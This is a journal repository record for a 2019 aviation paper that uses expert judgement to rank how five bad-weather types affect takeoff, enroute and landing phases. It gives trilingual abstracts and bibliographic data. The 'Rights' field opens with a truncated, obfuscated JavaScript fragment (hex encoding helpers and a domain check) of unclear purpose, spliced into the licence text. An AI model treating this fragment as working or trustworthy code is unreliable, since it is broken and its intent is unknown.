Record Details

ESTIMATION OF BAD WEATHER CONDITIONS INFLUENCE ON DIFFERENT PHASES OF FLIGHT USING EXPERT JUDGEMENT METHOD

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title ESTIMATION OF BAD WEATHER CONDITIONS INFLUENCE ON DIFFERENT PHASES OF FLIGHT USING EXPERT JUDGEMENT METHOD
Оценка влияния неблагоприятных погодных условий на различные этапы полета с помощью метода экспертных оценок
Оцінювання впливу несприятливих погодних умов на різні етапи польоту за допомогою методу експертних оцінок
 
Creator Shmelova, Tetiana; National Aviation University
Maksymchuk, Zhanna; National Aviation University
 
Subject
accident; artificial intelligence; bad weather conditions; expert judgement method; machine learning; stages of flight
656.7.086

авария; искусственный интеллект; неблагоприятные погодные условия; метод экспертных оценок; машинное обучение; этапы полета
656.7.086

аварія; штучний інтелект; несприятливі погодні умови; метод експертних оцінок; машинне навчання; етапи польоту
656.7.086
 
Description Purpose: estimation of the influence of five different types of bad weather conditions: fog, wind shear, thunderstorm, icing and snow on the aircraft operations during three stages of flight: takeoff and climb, enroute, descent and landing. Methods: using the significance of influence on the flight operations as the parameter of comparison, bad weather conditions are compared by experts in their questionnaires. With the help of expert judgement method, the experts’ group opinions are obtained, coordinated, the significance of calculations criteria and weight coefficients are calculated. Using the results of calculations, the general histogram of weight coefficients for three different stages of flight is built, representing the significance of bad weather conditions influence on aircraft operations. Results: the expert system methodology presented in this work helps to evaluate the impact of weather events on the flight operations and select the appropriate measures of preventing bad weather conditions influence on each stage of flight. Discussion: the derived expert system can be used in airplane operations to evaluate the impact caused by weather, for further improvement of the situational awareness and decision making process of aviation staff with the application of new artificial intelligence technologies.
Цель: оценка влияния пяти различных типов неблагоприятных погодных условий: тумана, сдвига ветра, грозы, обледенения и снега на эксплуатацию воздушных судов в течение трех этапов полета: взлета и набора высоты, полета по маршруту, снижения и посадки. Методы: используя значимость влияния на выполнение полета в качестве параметра сравнения, эксперты в своих анкетах сравнили неблагоприятные погодные условия. С помощью метода экспертных оценок получено и согласовано обобщенное мнение группы экспертов, вычислено критерии значимости расчетов и весовые коэффициенты. По результатам расчетов построено общую гистограмму весовых коэффициентов для трех различных этапов полета, которая отражает значимость влияния неблагоприятных погодных условий на эксплуатацию воздушных судов. Результаты: методология экспертной системы, представленная в данной работе, помогает оценить влияние погодных явлений на выполнение полета и выбрать соответствующие меры для предотвращения воздействия неблагоприятных погодных условий в течение различных этапов полета. Обсуждение: полученная экспертная система может быть использована в эксплуатации воздушных судов для оценки влияния погоды, для дальнейшего совершенствования ситуационной осведомленности и процесса принятия решений авиационного персонала с использованием новых технологий искусственного интеллекта.
Мета: оцінка впливу п'яти різних типів несприятливих погодних умов: туману, зсуву вітру, грози, обмерзання і снігу на експлуатацію повітряних суден протягом трьох етапів польоту: зльоту і набору висоти, польоту по маршруту, зниження і посадки. Методи: використовуючи значимість впливу на виконання польоту як параметр порівняння, експерти у своїх анкетах порівняли несприятливі погодні умови. За допомогою методу експертних оцінок отримано та  узгоджено узагальнену думку групи експертів, обчислено критерії значимості розрахунків і вагові коефіцієнти. За результатами розрахунків побудовано загальну гістограму вагових коефіцієнтів для трьох різних етапів польоту, що відображає значимість впливу несприятливих погодних умов на експлуатацію повітряних суден. Результати: методологія експертної системи, представлена в даній роботі, допомагає оцінити вплив погодних явищ на виконання польоту та вибрати відповідні заходи для запобігання впливу несприятливих погодних умов протягом різних етапів польоту. Обговорення: отримана експертна система може бути використана в експлуатації повітряних суден для оцінки впливу погоди, для подальшого вдосконалення ситуаційної обізнаності та процесу прийняття рішень авіаційного персоналу з використанням нових технологій штучного інтелекту.
 
Publisher National Aviation University
 
Contributor


 
Date 2019-09-09
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13827
10.18372/2306-1472.79.13827
 
Source Proceedings of the National Aviation University; Том 79, № 2 (2019); 19-27
Вестник Национального авиационного университета; Том 79, № 2 (2019); 19-27
Вісник Національного Авіаційного Університету; Том 79, № 2 (2019); 19-27
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ